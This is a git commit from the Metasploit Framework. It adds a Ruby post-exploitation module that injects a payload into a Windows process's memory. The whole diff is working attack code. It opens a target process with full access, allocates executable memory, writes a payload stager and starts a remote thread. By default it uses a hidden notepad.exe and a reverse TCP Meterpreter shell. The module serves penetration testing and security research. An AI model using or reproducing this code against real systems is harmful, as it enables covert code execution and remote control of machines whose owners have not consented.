Add Carlos Perez's payload injection module

sinn3r · sinn3r · commit e93b7ffcaf43 · 2013-01-23T14:07:48.000-06:00
See rapid7#1201
diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb
@@ -0,0 +1,127 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Manage Memory Payload Injection Module',
+			'Description'   => %q{
+				This module will inject into the memory of a process a specified windows payload.
+				If a payload or process is not provided one will be created by default
+				using a reverse x86 TCP Meterpreter Payload.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Carlos Perez <carlos_perez[at]darkoperator.com>'
+				],
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'Targets'       => [ [ 'Windows', {} ] ],
+			'DefaultTarget' => 0,
+			'DisclosureDate'=> "Oct 12 2011"
+		))
+
+		register_options(
+			[
+				OptInt.new('PID',
+					[false, 'Process Identifier to inject of process to inject payload.'])
+			], self.class)
+	end
+
+	# Run Method for when run command is issued
+	def exploit
+		# syinfo is only on meterpreter sessions
+		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+
+		pid = datastore['PID']
+
+		if pid == 0
+			pid = create_temp_proc()
+		end
+
+		if payload.send(:pinst).arch.first =~ /64/ and client.platform =~ /x86/
+			print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
+			print_error("Migrate to an x64 process and try again.")
+			return false
+		else
+			inject_into_pid(pid,datastore['NEWPROCESS'])
+		end
+	end
+
+	# Checks the Architeture of a Payload and PID are compatible
+	# Returns true if they are false if they are not
+	def arch_check(pid)
+		# get the pid arch
+		client.sys.process.processes.each do |p|
+			# Check Payload Arch
+			if pid == p["pid"]
+				print_status("Process found checking Architecture")
+				if payload.send(:pinst).arch.first == p['arch']
+					print_good("Process is the same architecture as the payload")
+					return true
+				else
+					print_error("The PID #{ p['arch']} and Payload #{payload.send(:pinst).arch.first} architectures are different.")
+					return false
+				end
+			end
+		end
+	end
+
+	# Creates a temp notepad.exe to inject payload in to given the payload
+	# Returns process PID
+	def create_temp_proc()
+		windir = client.fs.file.expand_path("%windir%")
+		# Select path of executable to run depending the architecture
+		if payload.send(:pinst).arch.first== "x86" and client.platform =~ /x86/
+			cmd = "#{windir}\\System32\\notepad.exe"
+		elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x64/
+			cmd = "#{windir}\\System32\\notepad.exe"
+		elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x86/
+			cmd = "#{windir}\\Sysnative\\notepad.exe"
+		elsif payload.send(:pinst).arch.first == "x86" and client.platform =~ /x64/
+			cmd = "#{windir}\\SysWOW64\\notepad.exe"
+		end
+		# run hidden
+		proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
+		return proc.pid
+	end
+
+	def inject_into_pid(pid,newproc)
+		print_status("Performing Architecture Check")
+		# If architecture check fails and a new process is wished to inject to one with the proper arch
+		# will be created
+		if arch_check(pid)
+			pid = create_temp_proc() if newproc
+			print_status("Injecting #{payload.send(:pinst).name} into process ID #{pid}")
+			begin
+				print_status("Opening process #{pid}")
+				host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+				print_status("Generating payload")
+				raw = payload.generate
+				print_status("Allocating memory in procees #{pid}")
+				mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
+				# Ensure memory is set for execution
+				host_process.memory.protect(mem)
+				print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
+				print_status("Writing the stager into memory...")
+				host_process.memory.write(mem, raw)
+				host_process.thread.create(mem, 0)
+				print_good("Successfully injected payload in to process: #{pid}")
+			rescue ::Exception => e
+				print_error("Failed to Inject Payload to #{pid}!")
+				print_error(e.to_s)
+			end
+		end
+	end
+end
